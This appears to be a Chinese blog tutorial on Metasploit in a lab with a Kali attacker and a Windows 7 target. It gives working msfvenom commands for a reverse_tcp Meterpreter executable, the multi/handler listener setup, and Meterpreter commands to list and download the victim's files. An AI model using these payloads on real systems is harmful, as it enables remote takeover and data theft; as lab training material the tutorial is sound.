Metasploit应用

目录

一、准备

1.kali主机

2.Win7靶机

二、介绍

三、环境搭建

1.root用户登录kali

2.生成被控端

2.启动主控端

四、控制


一、准备

1.kali主机

2.Win7靶机

如未安装kali或Win7,可参考以下链接:

Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程

史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7

二、介绍

本次测试需要进行远程控制操作,要了解远程控制程序基础。

远程控制软件被控端:被控端是需要在靶机上运行的,有点类似于木马,它可以是一段代码,也可以是个直接执行的程序

远程控制软件主控端:主控端与被控端成对使用,通过主控端可对被控端执行命令

三、环境搭建

1.root用户登录kali

推荐使用root身份登录kali,以避免测试过程出现权限问题。

如果不知道如何登录,可参考以下链接:

2020最新kali设置root用户(直接设置root用户/单用户模式设置root用户)_陈健平的博客-CSDN博客_kali怎么进入root用户

2.生成被控端

首先在kali终端执行命令:

ifconfig

查看本机ip:192.168.234.128

这里我们使用最简单的msfvenom命令来生成一个被控端程序,使用的被控端程序就是一个用于Windows平台下的反向远程控制程序:windows/meterpreter/reverse_tcp,它的参数lhost的值为192.168.234.128

在kali终端执行命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.234.128 lport=5000 -f exe -o /root/payload.exe

将会在root文件夹下生成payload.exe

如果我们让这个文件在某一台计算机上执行的话,那么这台计算机就会立刻回连到192.168.234.128上。

2.启动主控端

这个主控端需要在Metasploit中启动。

首先在kali终端执行命令:

msfconsole

启动Metasploit

成功启动之后依次执行以下命令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.234.128
set lport 5000
exploit

此时它会等待靶机运行payload.exe

我们将生成的payload.exe复制到虚拟机Windows7中,然后执行这个文件。在主控端就可以打开一个Meterpreter控制会话

 此时已经可以对靶机进行控制了

四、控制

我们在靶机上与payload.exe同目录下创建文件98.txt并在文件内容中写下“666”

我们将尝试在kali主机对98.txt进行下载

在kali终端执行命令:

ls

查看靶机文件目录,默认查看的位置是paylload.exe所在目录

 我们发现98.txt与payload.exe在该目录中

在kali终端执行命令:

download 98.txt

尝试下载98.txt到kali主机中

 此时已经下载完成,进入kali主机的root文件夹内查看该文件

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值